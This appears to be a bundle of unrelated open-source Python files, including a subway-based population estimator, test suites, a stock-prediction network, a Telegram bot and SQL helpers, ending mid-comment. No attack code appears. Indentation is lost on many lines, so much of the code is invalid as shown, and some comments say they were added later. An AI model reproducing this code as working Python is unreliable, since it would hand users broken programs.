# --- dynamicPopulation.py | PeterJWei/CitywideFootprinting | MIT ---
from Remote2StopID import remoteDictionary
from buildingData import buildingData
from plotNYCblocks import plotNYCblocks
from loadEnergy import loadEnergy
import time
import web
from subwayStream import subwayStream
urls = ("/", "dynamicAPI")
class dynamicAPI:
def GET(self):
self.dynamic = showDynamicPopulation()
print("dynamic API")
return self.dynamic.serviceStartup()
class showDynamicPopulation:
    def __init__(self, borough=0):  # borough options: 0 all boroughs, 1 Manhattan, 2 Bronx, 3 Brooklyn, 4 Queens, 5 Staten Island
self.init(borough)
self.borough = borough
return
def init(self, borough=0):
self.MTAstream = subwayStream()
E = loadEnergy()
self.energyDictionary = E.energyDictionary
S = remoteDictionary()
B = buildingData()
self.BBL2CT = B.BBL2CT
self.CT2EUI()
#S = subwayStream()
self.blocks2Occupancy = {}
boroughFileName = {0:"AllBoroughs",
1:"Manhattan",
2:"Bronx",
3:"Brooklyn",
4:"Queens",
5:"Staten Island"}
print("Determining Closest Station...")
start = time.time()
self.nearestStation = B.closestStation(S.coordinates, borough, boroughFileName[borough])
end = time.time()
print("Finished: " + str(end-start) + " s\n")
print("Inverting Closest Station...")
start = time.time()
self.station2Blocks = B.station2Blocks()
end = time.time()
print("Finished: " + str(end-start) + " s\n")
self.timeSeriesEntries = S.timeSeriesDataEntries
self.timeSeriesExits = S.timeSeriesDataExits
def CT2EUI(self):
self.CTEUI = {}
for BBL in self.energyDictionary:
if BBL in self.BBL2CT:
block = self.BBL2CT[BBL]
if block not in self.CTEUI:
self.CTEUI[block] = 0.0
self.CTEUI[block] += self.energyDictionary[BBL]
def getBlocks2Occupancy(self,t):
self.blocks2Occupancy = {}
stationTrains = self.MTAstream.getData(0x1FF)
for station in stationTrains:
print(str(stationTrains[station]) + " trains passed station: " + station)
count = 0
for station in stationTrains:
            #Translate s to station
#TODO
if station not in self.station2Blocks:
#print("No station: " + str(station) + " found")
continue
#for station in self.station2Blocks:
blockCount = len(self.station2Blocks[station])
for block in self.station2Blocks[station]:
if block not in self.blocks2Occupancy:
self.blocks2Occupancy[block] = 0
if station in self.timeSeriesEntries:
entryDiff = self.timeSeriesEntries[station][t] - self.timeSeriesEntries[station][t-1]
exitDiff = self.timeSeriesExits[station][t] - self.timeSeriesExits[station][t-1]
if entryDiff > 100000 or exitDiff > 100000 or entryDiff < 0 or exitDiff < 0:
continue
count += 1
self.blocks2Occupancy[block] += (exitDiff - entryDiff)/blockCount/48
print("Number of nonzero changes: " + str(count) + "/" + str(len(self.blocks2Occupancy)))
def plotRealtime(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
self.P.examplePlotRealTime(self.blocks2Occupancy)
def startup(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
#self.P.testRun()
self.P.exampleRun()
def plotDynamic(self):
self.P = plotNYCblocks(self.CTEUI, self.borough)
self.P.dynamicPopulation(self.blocks2Occupancy)
self.P.examplePlot2()
doPopulation = web.application(urls, locals())
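# Not in the original file: a web.py application of this kind is normally
# started from the command line, along these lines:
#
#   if __name__ == "__main__":
#       doPopulation.run()   # serves "/" through dynamicAPI.GET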
# --- volttrontesting/testutils/test_multimessagebus_fixture.py | rmay-intwine/volttron | Apache-2.0 ---
import pytest
import requests
@pytest.fixture
def web_bound_correctly(volttron_multi_messagebus):
source, sink = volttron_multi_messagebus
    assert sink.bind_web_address, "Sink should always have web enabled"
    assert not source.bind_web_address, "Source should never have web enabled"
yield source, sink
def test_correct_number_of_instances(web_bound_correctly):
source, sink = web_bound_correctly
if source.messagebus == 'rmq':
assert source.ssl_auth, "source must be ssl enabled for rmq"
if sink.messagebus == 'rmq':
assert sink.ssl_auth, "sink must be ssl enabled for rmq"
def test_correct_remote_ca_specified(web_bound_correctly):
source, sink = web_bound_correctly
if sink.messagebus == 'rmq':
assert source.requests_ca_bundle
with open(source.requests_ca_bundle) as f:
requests_ca_content = f.read()
data = sink.certsobj.ca_cert(public_bytes=True)
assert data in requests_ca_content
if source.messagebus == 'zmq':
assert data == requests_ca_content
if source.messagebus == 'rmq':
assert data != source.certsobj.ca_cert(public_bytes=True)
def test_can_connect_web_using_remote_platform_ca(web_bound_correctly):
source, sink = web_bound_correctly
    # Note: we are using the source's requests_ca_bundle, not the sink's CA.
# This way we know we are testing the transference from one to the other
print("source requests_ca_bundle", source.requests_ca_bundle)
if sink.messagebus == 'rmq':
print("sink certs_filename", sink.certsobj.cert_file(sink.certsobj.root_ca_name))
# these two lines enable debugging at httplib level (requests->urllib3->httplib)
# you will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.
# the only thing missing will be the response.body which is not logged.
import httplib
httplib.HTTPConnection.debuglevel = 1
resp = requests.get(sink.discovery_address, verify=source.requests_ca_bundle)
assert resp.ok
assert resp.headers['Content-Type'] == 'application/json'
def test_instance_config_matches_instance(web_bound_correctly):
source, sink = web_bound_correctly
def config_file_correct(instance):
import os
from ConfigParser import ConfigParser
config_file = os.path.join(instance.volttron_home, "config")
assert os.path.isfile(config_file)
parser = ConfigParser()
# with open(config_file, 'rb') as cfg:
parser.read(config_file)
assert instance.instance_name == parser.get('volttron', 'instance-name')
assert instance.vip_address == parser.get('volttron', 'vip-address')
assert instance.messagebus == parser.get('volttron', 'message-bus')
if instance.bind_web_address:
assert instance.bind_web_address == parser.get('volttron', 'bind-web-address')
if instance.volttron_central_address:
assert instance.volttron_central_address == parser.get('volttron', 'volttron-central-address')
config_file_correct(source)
config_file_correct(sink)
# --- StockTrainer/SingleStockTrainer.py | mslovy/starry | Apache-2.0 ---
import tensorflow as tf
import pandas as pd
import numpy
hist_data = pd.read_csv("000423_hist_data_new.csv")
basics_data = pd.read_csv("000423_basics.csv", encoding="gbk")
num_test = 10
hist_data = hist_data.drop('date',axis=1)
hist_data = hist_data.drop('price_change', axis=1)
hist_data = hist_data.drop('turnover', axis=1)
highest_price = max(hist_data['high'])
lowest_price = min(hist_data['low'])
maxvol = max(hist_data['volume'])
lowvol = min(hist_data['volume'])
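# Min-max normalize prices and volumes into [-1, 1]: (2*x - (min + max)) / (max - min)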
hist_data['open'] = (2*hist_data['open'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['high'] = (2*hist_data['high'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['close'] = (2*hist_data['close'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['low'] = (2*hist_data['low'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma5'] = (2*hist_data['ma5'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma10'] = (2*hist_data['ma10'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['ma20'] = (2*hist_data['ma20'] - (lowest_price + highest_price))/(highest_price - lowest_price)
hist_data['volume'] = (2*hist_data['volume'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma5'] = (2*hist_data['v_ma5'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma10'] = (2*hist_data['v_ma10'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['v_ma20'] = (2*hist_data['v_ma20'] - (lowvol + maxvol))/(maxvol - lowvol)
hist_data['p_change'] = hist_data['p_change']/10
p_data = hist_data['p_change']
hist_data['pr_change'] = p_data[:-1]
dpr_change = hist_data['pr_change']
dpr_change[1:] = dpr_change[:-1]
dpr_change[0] = 0
training_set = hist_data.tail(hist_data.shape[0] - num_test)
testing_set = hist_data.head(num_test)
# Hyperparameter settings
learning_rate = 0.0000001
training_epochs = 10000
batch_size = 50
display_step = 1
examples_to_show = 10
# Neural network parameters
n_hidden_1 = 50000 # 1st layer num features
n_hidden_2 = 5000 # 2nd layer num features
n_input = 12
n_output = 1
# TensorFlow computation graph inputs
X = tf.placeholder("float", [None, n_input])
Y = tf.placeholder("float", [None])
weights = {
'w1': tf.get_variable("W1", shape=[n_input, n_hidden_1],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
'w2': tf.get_variable("W2", shape=[n_hidden_1, n_hidden_2],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
# 'w3': tf.get_variable("W3", shape=[n_hidden_2, n_hidden_3],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
'w4': tf.get_variable("W4", shape=[n_hidden_2, n_output],initializer=tf.contrib.layers.xavier_initializer(uniform=False)),
}
biases = {
'w1': tf.get_variable("b1", shape=[n_hidden_1],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
'w2': tf.get_variable("b2", shape=[n_hidden_2],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
# 'w3': tf.get_variable("b3", shape=[n_hidden_3],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
'w4': tf.get_variable("b4", shape=[n_output],initializer=tf.contrib.layers.xavier_initializer(uniform=True)),
}
# Build the encoder network
def encoder(x):
    # Hidden layer #1 (tanh activation)
layer_1 = tf.nn.tanh(tf.add(tf.matmul(x, weights['w1']),
biases['w1']))
layer_1 = tf.nn.dropout(layer_1, keep_prob=0.5)
    # Hidden layer #2 (tanh activation)
layer_2 = tf.nn.tanh(tf.add(tf.matmul(layer_1, weights['w2']),
biases['w2']))
layer_2 = tf.nn.dropout(layer_2, keep_prob=0.5)
# layer_3 = tf.nn.tanh(tf.add(tf.matmul(layer_2, weights['w3']),
# biases['w3']))
# layer_3 = tf.nn.dropout(layer_3, keep_prob=0.5)
layer_4 = tf.nn.tanh(tf.add(tf.matmul(layer_2, weights['w4']),
biases['w4']))
#layer_final = tf.abs(tf.multiply(tf.subtract(layer_4 - y),0.5))
return layer_4
# Build the model
encoder_op = encoder(X)
# Prediction
y_pred = encoder_op
# Targets (labels) are fed in through the Y placeholder
y_true = Y
#y_diff_true = tf.multiply(tf.abs(y_pred - y_true), 1/y_true)
# Define loss and optimizer, minimize the squared error
cost = tf.reduce_sum(tf.pow(y_pred - y_true, 2))
#cost = tf.reduce_sum(y_diff_true)
#cost = tf.reduce_mean(-tf.reduce_sum(y_true*tf.log(y_pred) + (1-y_true)*tf.log(1-y_pred), reduction_indices=1))
#optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)
# Initializing the variables
init = tf.initialize_all_variables()
# Launch the graph
# Using InteractiveSession (more convenient while using Notebooks)
sess = tf.InteractiveSession()
sess.run(init)
total_batch = int((training_set.shape[0])/batch_size)
def shuffe_data(data):
perm = numpy.arange(data.shape[0])
numpy.random.shuffle(perm)
return data.iloc[perm,:]
def next_batch(data, index):
start = batch_size * index
end = batch_size * (index+1)
data_x = data.iloc[start:end,:-1]
data_y = data['pr_change'].iloc[start:end]
return data_x, data_y
def predict_samples():
testX = training_set.iloc[:, :-1]
testY = training_set['pr_change']
predict_result = sess.run(
y_pred, feed_dict={X: testX})
predict_result = numpy.reshape(predict_result,(predict_result.size,))
#print(predict_result)
#print(predict_result)
#print(testY)
predict_diff = abs(predict_result - testY)
#print(predict_diff)
best_predict = predict_diff[predict_diff < 0.15]
print("samples accuracy: %s", best_predict.size / predict_diff.size)
def predict():
testX = testing_set.iloc[1:, :-1]
#print(testX)
testY = testing_set['pr_change'].iloc[1:]
predict_result = sess.run(
y_pred, feed_dict={X: testX})
#myw1 = sess.run(weights['w1'])
#print(myw1)
predict_result = numpy.reshape(predict_result,(predict_result.size,))
print(predict_result)
#print(testY)
predict_diff = abs(predict_result - testY)
#print(predict_diff.values)
best_predict = predict_diff[predict_diff < 0.15]
#print(predict_result)
#print(testY.values)
print("accuracy: %s", best_predict.size / predict_diff.size)
# Training cycle
for epoch in range(training_epochs):
# Loop over all batches
shuffed_data = shuffe_data(hist_data)
for i in range(total_batch):
batch_xs, batch_ys = next_batch(shuffed_data, i)
# Run optimization op (backprop) and cost op (to get loss value)
_, c = sess.run([optimizer, cost], feed_dict={X: batch_xs, Y: batch_ys})
# Display logs per epoch step
if epoch % display_step == 0:
print("Epoch:", '%04d' % (epoch+1),
"cost=", "{:.9f}".format(c))
# prediction
if epoch % 10 == 0:
predict_samples()
predict()
print("Optimization Finished!")
# Applying encode and decode over test set
predict()
# Compare original images with their reconstructions
#f, a = plt.subplots(2, 10, figsize=(10, 2))
#for i in range(examples_to_show):
# a[0][i].imshow(np.reshape(mnist.test.images[i], (28, 28)))
# a[1][i].imshow(np.reshape(encode_decode[i], (28, 28)))
#f.show()
#plt.draw()
#plt.waitforbuttonpress()
# --- example.py | Henrik168/TelegramBot | MIT ---
import time
import config
from TelegramBot.TelegramThread import TelegramThread, TelegramBot, MessageData
import CustomLogger
def hello(str_message: MessageData, bot: TelegramBot):
bot.send_text(message="Hello dude!", chatroom_id=str_message.chatroom_id)
def reply_time(str_message: MessageData, bot: TelegramBot):
bot.send_text(message=f"It is: {time.time()}", chatroom_id=str_message.chatroom_id)
def main():
logger = CustomLogger.getLogger(level=10)
telegram_thread = TelegramThread(bot_token=config.bot_token,
chatroom_id=config.chatroom_id,
logger=logger)
telegram_thread.register_command("/hello", hello)
telegram_thread.register_command("/time", reply_time)
telegram_thread.start()
telegram_thread.send_text(message="test")
"""with open("data/screenshot.png", "rb") as f:
image = f.read()
telegram_thread.send_photo(file=image)"""
while True:
message = telegram_thread.request_message()
if message:
print(message)
time.sleep(0.1)
if __name__ == "__main__":
main()
# --- tests/test_location_request_intent_handler.py | bazwilliams/pollen-count | MIT ---
import unittest
import os
import mock
import handler as sut
class fakeLocation():
@property
def latitude(self):
return 55.8642
@property
def longitude(self):
return -4.2518
class TestLocationRequestIntentHandler(unittest.TestCase):
@mock.patch.object(sut.Pollen, 'pollencount', "Awful")
@mock.patch.object(sut.Nominatim, 'geocode', lambda self, city: fakeLocation())
def setUp(self):
os.environ['SKILL_ID'] = "TEST_SKILL_ID"
self.context = {}
self.event = {
'session': {
'sessionId': 'unittest',
'application': {
'applicationId': "TEST_SKILL_ID"
}
},
'request': {
'requestId': 'test-locationrequest',
'type': 'IntentRequest',
'intent': {
'name': 'LocationRequestIntent',
'slots': {
'Location': {
'name': 'Location',
'value': 'glasgow'
}
}
}
},
'context':{}
}
self.result = sut.lambda_handler(self.event, self.context)
def testOutputSpeech(self):
self.assertEqual(
self.result['response']['outputSpeech'],
{
'text': "Today in glasgow, the Pollen Count is Awful",
'type': "PlainText"})
def testCard(self):
self.assertEqual(
self.result['response']['card'],
{
'title': "Pollen Count",
'content': "Today in glasgow, the Pollen Count is Awful",
'type': "Simple"})
def testShouldEndSession(self):
self.assertTrue(self.result['response']['shouldEndSession'])
def testResponse(self):
self.assertEqual(self.result['sessionAttributes'], {})
self.assertEqual(self.result['version'], "1.0")
if __name__ == "__main__":
unittest.main()
# --- utils/bng_analyzer_py/bng_analysis_example.py | mcellteam/mcell | MIT ---
"""
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to [http://unlicense.org]
"""
import sys
import os
import pandas as pd
MCELL_PATH = os.environ.get('MCELL_PATH', '')
if MCELL_PATH:
sys.path.append(os.path.join(MCELL_PATH, 'lib'))
else:
print("Error: variable MCELL_PATH that is used to find the mcell library was not set.")
sys.exit(1)
import mcell as m
# utility module to load an ASCII viz_output .dat file
import viz_reader
# arbitrary values are used here
WEIGHTS = {
'ampar_tarp': 1.5,
'psd95': 2.5,
'syngap': 3.5,
}
def analyze_dat_file(file_name):
# read the .dat file and parse complexes to the internal MCell
# representation
complex_counts = viz_reader.read_dat_file(file_name)
#print(complex_counts[0][0])
#print(complex_counts[0][1])
# process the read data
for (complex, count) in complex_counts:
weight = 0.0
# iterate over elementary molecules from which the
# complex is composed
for mi in complex.elementary_molecules:
name = mi.elementary_molecule_type.name
if name not in WEIGHTS:
print("Error: unknown molecular weight of " + name)
sys.exit(1)
weight += WEIGHTS[name]
print("----------------------------------")
print(complex.to_bngl_str())
print("")
print("weight: " + str(weight) + ", copy nr.: " + str(count))
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Expected .dat file name as argument")
sys.exit(1)
analyze_dat_file(sys.argv[1])
# --- preprocessing/plot_kernel_regression.py | GPrathap/OpenBCIPython | MIT ---
"""
========================================================================
Comparison of kernel regression (KR) and support vector regression (SVR)
========================================================================
Toy example of 1D regression using kernel regression (KR) and support vector
regression (SVR). KR provides an efficient way of selecting a kernel's
bandwidth via leave-one-out cross-validation, which is considerably faster
than an explicit grid-search as required by SVR. The main disadvantages are
that it does not support regularization and is not robust to outliers.
"""
import time

import matplotlib.pyplot as plt
import numpy as np
import requests
from sklearn.svm import SVR
from sklearn.grid_search import GridSearchCV
from sklearn.learning_curve import learning_curve

from kernel_regression import KernelRegression
np.random.seed(0)
def f(x):
return 3*np.cos(x/2) + x**2/5 + 3
xs = np.random.rand(200) * 10
ys = f(xs) + 2*np.random.randn(*xs.shape)
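# Illustrative sketch (not part of the original script): the leave-one-out
# cross-validation that makes kernel-regression bandwidth selection cheap,
# shown for a 1D Nadaraya-Watson estimator. All names below are local to
# this sketch.
def nw_loo_mse(x, y, bandwidth):
    # Gaussian kernel weights between every pair of points
    w = np.exp(-0.5 * ((x[:, None] - x[None, :]) / bandwidth) ** 2)
    np.fill_diagonal(w, 0.0)  # leave each point out of its own prediction
    pred = (w * y[None, :]).sum(axis=1) / w.sum(axis=1)
    return np.mean((y - pred) ** 2)

# e.g. best_h = min(np.logspace(-2, 2, 10), key=lambda h: nw_loo_mse(xs, ys, h))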
birthdata_url = 'https://www.umass.edu/statdata/statdata/data/lowbwt.dat'
birth_file = requests.get(birthdata_url)
birth_data = birth_file.text.split('\r\n')[5:]
birth_header = [x for x in birth_data[0].split(' ') if len(x) >= 1]
birth_data = [[float(x) for x in y.split(' ') if len(x) >= 1] for y in birth_data[1:] if len(y) >= 1]
# Pull out target variable
y_vals = np.array([x[1] for x in birth_data])
# Pull out predictor variables (not id, not target, and not birthweight)
x_vals = np.array([x[2:9] for x in birth_data])
# Split data into train/test = 80%/20%
train_indices = np.random.choice(len(x_vals), int(round(len(x_vals) * 0.8)), replace=False)
test_indices = np.array(list(set(range(len(x_vals))) - set(train_indices)))
x_vals_train = x_vals[train_indices]
x_vals_test = x_vals[test_indices]
y_vals_train = y_vals[train_indices]
y_vals_test = y_vals[test_indices]
# Normalize by column (min-max norm)
def normalize_cols(m):
col_max = m.max(axis=0)
col_min = m.min(axis=0)
return (m - col_min) / (col_max - col_min)
x_vals_train = np.nan_to_num(normalize_cols(x_vals_train))
x_vals_test = np.nan_to_num(normalize_cols(x_vals_test))
###############################################################################
# Generate sample data
# X = np.sort(5 * np.random.rand(100, 1), axis=0)
# y = np.sin(X).ravel()
X = x_vals_train
y = y_vals_train
###############################################################################
# Add noise to targets
y += 0.5 * (0.5 - np.random.rand(y.size))
###############################################################################
# Fit regression models
svr = GridSearchCV(SVR(kernel='rbf'), cv=5,
param_grid={"C": [1e-1, 1e0, 1e1, 1e2],
"gamma": np.logspace(-2, 2, 10)})
kr = KernelRegression(kernel="rbf", gamma=np.logspace(-2, 2, 10))
t0 = time.time()
y_svr = svr.fit(X, y).predict(X)
print("SVR complexity and bandwidth selected and model fitted in %.3f s" \
% (time.time() - t0))
t0 = time.time()
y_kr = kr.fit(X, y).predict(X)
print("KR including bandwith fitted in %.3f s"% (time.time() - t0))
###############################################################################
# Visualize models
# X is multi-dimensional here, so visualize against the first feature only
plt.scatter(X[:, 0], y, c='k', label='data')
plt.plot(X[:, 0], y_kr, c='g', label='Kernel Regression')
plt.plot(X[:, 0], y_svr, c='r', label='SVR')
plt.xlabel('data')
plt.ylabel('target')
plt.title('Kernel regression versus SVR')
plt.legend()
# Visualize learning curves
plt.figure()
train_sizes, train_scores_svr, test_scores_svr = \
learning_curve(svr, X, y, train_sizes=np.linspace(0.1, 1, 10),
scoring="mean_squared_error", cv=10)
train_sizes_abs, train_scores_kr, test_scores_kr = \
learning_curve(kr, X, y, train_sizes=np.linspace(0.1, 1, 10),
scoring="mean_squared_error", cv=10)
plt.plot(train_sizes, test_scores_svr.mean(1), 'o-', color="r",
label="SVR")
plt.plot(train_sizes, test_scores_kr.mean(1), 'o-', color="g",
label="Kernel Regression")
plt.yscale("symlog", linthreshy=1e-7)
plt.ylim(-10, -0.01)
plt.xlabel("Training size")
plt.ylabel("Mean Squared Error")
plt.title('Learning curves')
plt.legend(loc="best")
plt.show()
# --- modules/plugin_social_auth/social/apps/tornado_app/utils.py | KallyMilton/w2p-social-auth | BSD-3-Clause ---
from functools import wraps
from social.utils import setting_name
from social.strategies.utils import get_strategy
DEFAULTS = {
'STORAGE': 'social.apps.tornado_app.models.TornadoStorage',
'STRATEGY': 'social.strategies.tornado_strategy.TornadoStrategy'
}
def get_helper(request_handler, name):
return request_handler.settings.get(setting_name(name),
DEFAULTS.get(name, None))
def load_strategy(request_handler, *args, **kwargs):
backends = get_helper(request_handler, 'AUTHENTICATION_BACKENDS')
strategy = get_helper(request_handler, 'STRATEGY')
storage = get_helper(request_handler, 'STORAGE')
return get_strategy(backends, strategy, storage, request_handler.request,
request_handler=request_handler, *args, **kwargs)
def strategy(redirect_uri=None):
def decorator(func):
@wraps(func)
def wrapper(self, backend, *args, **kwargs):
uri = redirect_uri
if uri and not uri.startswith('/'):
uri = self.reverse_url(uri, backend)
self.strategy = load_strategy(self,
backend=backend,
redirect_uri=uri, *args, **kwargs)
return func(self, backend, *args, **kwargs)
return wrapper
return decorator
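# Hypothetical usage sketch (not part of the original module); the handler
# and URL name here are assumptions:
#
#   class CompleteHandler(tornado.web.RequestHandler):
#       @strategy('complete')   # reverse_url name used for the redirect URI
#       def get(self, backend):
#           # self.strategy is now a configured strategy instance
#           ...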
# --- PiCN/Layers/ICNLayer/ForwardingInformationBase/test/test_ForwardingInformationBasePrefix.py | DimaMansour/PiCN | BSD-3-Clause ---
"""Test of in-memory Forwarding Information Base using longest prefix matching"""
import multiprocessing
import unittest
from PiCN.Layers.ICNLayer.ForwardingInformationBase import ForwardingInformationBaseMemoryPrefix
from PiCN.Packets import Name
class test_ForwardingInformationBaseMemoryPrefix(unittest.TestCase):
"""Test of in-memory Forwarding Information Base using longest prefix matching"""
def setUp(self):
self.manager = multiprocessing.Manager()
self.fib = ForwardingInformationBaseMemoryPrefix()
def tearDown(self):
pass
def test_add_entry_to_fib(self):
"""Test add entry to fib"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
def test_find_entry_to_fib(self):
"""Test finding a fib entry"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
fib_entry = self.fib.find_fib_entry(name)
self.assertEqual(fib_entry.name, name)
self.assertEqual(fib_entry.faceid, fid)
def test_find_entry_to_fib_multiple_entries(self):
"""Test finding a fib entry with multiple entries"""
fid1 = [1]
fid2 = [2]
name1 = Name("/test/data")
name2 = Name("/data/test")
self.fib.add_fib_entry(name2, fid2)
self.fib.add_fib_entry(name1, fid1)
entry = self.fib._container[1]
self.assertEqual(entry.name, name2)
self.assertEqual(entry.faceid, fid2)
fib_entry = self.fib.find_fib_entry(name1)
self.assertEqual(fib_entry.name, name1)
self.assertEqual(fib_entry.faceid, fid1)
def test_find_entry_to_fib_longest_match(self):
"""Test finding a fib using a longest match"""
fid1 = [1]
fid2 = [2]
name1 = Name("/test/data")
name2 = Name("/data")
name3 = Name("/test/data/object")
name4 = Name("/data/object/content")
self.fib.add_fib_entry(name1, fid1)
self.fib.add_fib_entry(name2, fid2)
fib_entry1 = self.fib.find_fib_entry(name3)
fib_entry2 = self.fib.find_fib_entry(name4)
self.assertEqual(fib_entry1.name, name1)
self.assertEqual(fib_entry2.name, name2)
self.assertEqual(fib_entry1.faceid, fid1)
self.assertEqual(fib_entry2.faceid, fid2)
def test_find_entry_to_fib_no_match(self):
"""Test finding a fib entry with no match"""
fid = [1]
name1 = Name("/test/data")
name2 = Name("/data/test")
self.fib.add_fib_entry(name1, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name1)
self.assertEqual(entry.faceid, fid)
fib_entry = self.fib.find_fib_entry(name2)
self.assertEqual(fib_entry, None)
def test_remove_entry_to_fib(self):
"""Test remove a fib entry"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
        self.fib.remove_fib_entry(name)
        self.assertIsNone(self.fib.find_fib_entry(name))
def test_get_already_used_fib_face(self):
"""Test to get a fib entry if there are alreay used all faces of another one"""
fid1 = [1]
fid2 = [2]
fid3 = [3]
n1 = Name("/test/data/content")
n2 = Name("/test")
n3 = Name("/test/data")
already_used = []
self.fib.add_fib_entry(n1, fid1)
self.fib.add_fib_entry(n2, fid2)
self.fib.add_fib_entry(n3, fid3)
iname = Name("/test/data/content/object1")
#test best match
fib_entry = self.fib.find_fib_entry(iname)
self.assertEqual(fib_entry.faceid, fid1)
already_used.extend(fib_entry.faceid)
print(already_used)
# test 2nd best match
fib_entry = self.fib.find_fib_entry(iname, already_used)
print(fib_entry.name)
self.assertEqual(fib_entry.faceid, fid3)
already_used.extend(fib_entry.faceid)
print(already_used)
        # test 3rd best match
fib_entry = self.fib.find_fib_entry(iname, already_used)
print(fib_entry.name)
self.assertEqual(fib_entry.faceid, fid2)
already_used.extend(fib_entry.faceid)
print(already_used)
        # test that no match remains
fib_entry = self.fib.find_fib_entry(iname, already_used)
self.assertEqual(fib_entry, None)
def test_clear(self):
self.fib.add_fib_entry(Name('/test/foo'), [42], static=True)
self.fib.add_fib_entry(Name('/test/bar'), [1337], static=False)
self.assertEqual(2, len(self.fib.container))
self.fib.clear()
self.assertEqual(1, len(self.fib.container))
self.assertIsNotNone(self.fib.find_fib_entry(Name('/test/foo')))
def test_add_faceid_to_entry(self):
self.fib.add_fib_entry(Name('/test/foo'), [42], static=True)
self.fib.add_fib_entry(Name('/test/bar'), [1337], static=False)
self.assertEqual(2, len(self.fib.container))
self.fib.add_faceid_to_entry(Name("/test/bar"), 21)
entry = self.fib.find_fib_entry(Name("/test/bar"))
self.assertEqual([1337, 21], entry.faceid)
self.fib.add_faceid_to_entry(Name("/test/bar"), 21)
entry = self.fib.find_fib_entry(Name("/test/bar"))
self.assertEqual([1337, 21], entry.faceid)
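# Not in the original file: standard entry point so the tests can also be run
# directly with `python test_ForwardingInformationBasePrefix.py`.
if __name__ == "__main__":
    unittest.main()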
# --- ontask/dataops/sql/table_queries.py | LucasFranciscoCorreia/ontask_b | MIT ---
# -*- coding: utf-8 -*-
"""Direct SQL operations in the DB."""
import logging
from typing import Any, Dict, List, Mapping, Optional, Tuple
from django.db import connection
from psycopg2 import sql
from ontask import OnTaskDBIdentifier
from ontask.dataops.formula import EVAL_SQL, evaluate_formula
logger = logging.getLogger('ontask')
def clone_table(table_from: str, table_to: str):
"""Clone a table in the database.
:param table_from: Source table.
:param table_to: New table.
"""
with connection.connection.cursor() as cursor:
cursor.execute(sql.SQL('CREATE TABLE {0} AS TABLE {1}').format(
sql.Identifier(table_to),
sql.Identifier(table_from)))
def rename_table(table: str, new_name: str):
"""Rename a table in the database.
:param table: Current table name
:param new_name: New table name
:return: Nothing. Change reflected in the database table
"""
with connection.connection.cursor() as cursor:
cursor.execute(sql.SQL('ALTER TABLE {0} RENAME TO {1}').format(
sql.Identifier(table),
sql.Identifier(new_name),
))
def get_boolean_clause(
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
conjunction: bool = True,
) -> Tuple[sql.Composed, List]:
"""Create the boolean clause based on a formula and a list of pairs.
Create the SQL boolean clause to be added to a query by combining a
formula and a dictionary with key:value pairs. Both of them are optional
and are combined through conjunction/disjunction depending on the
conjunction variable.
:param filter_formula: Boolean formula
:param filter_pairs: Dictionary of key/value pairs.
:param conjunction: Boolean stating if the clauses need to be in a
conjunction.
:return: SQL clause and list of fields.
"""
clause = None
clause_fields = []
if filter_formula:
# There is a filter
clause, clause_fields = evaluate_formula(filter_formula, EVAL_SQL)
if filter_pairs:
c_txt = ' AND ' if conjunction else ' OR '
pairs_clause = sql.SQL(c_txt).join([
sql.SQL('{0} = {1}').format(
OnTaskDBIdentifier(key), sql.Placeholder())
for key, __ in filter_pairs.items()
])
pairs_fields = [lit_val for __, lit_val in filter_pairs.items()]
if clause:
clause = clause + sql.SQL(' AND ') + pairs_clause
clause_fields += pairs_fields
else:
clause = pairs_clause
clause_fields = pairs_fields
return clause, clause_fields
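# Hypothetical usage sketch (not part of the original module); the formula
# dict is assumed to be an already-parsed OnTask filter formula:
#
#   clause, fields = get_boolean_clause(
#       filter_formula=formula,
#       filter_pairs={'email': 'student@example.org'})
#   # clause is a psycopg2 sql.Composed along the lines of
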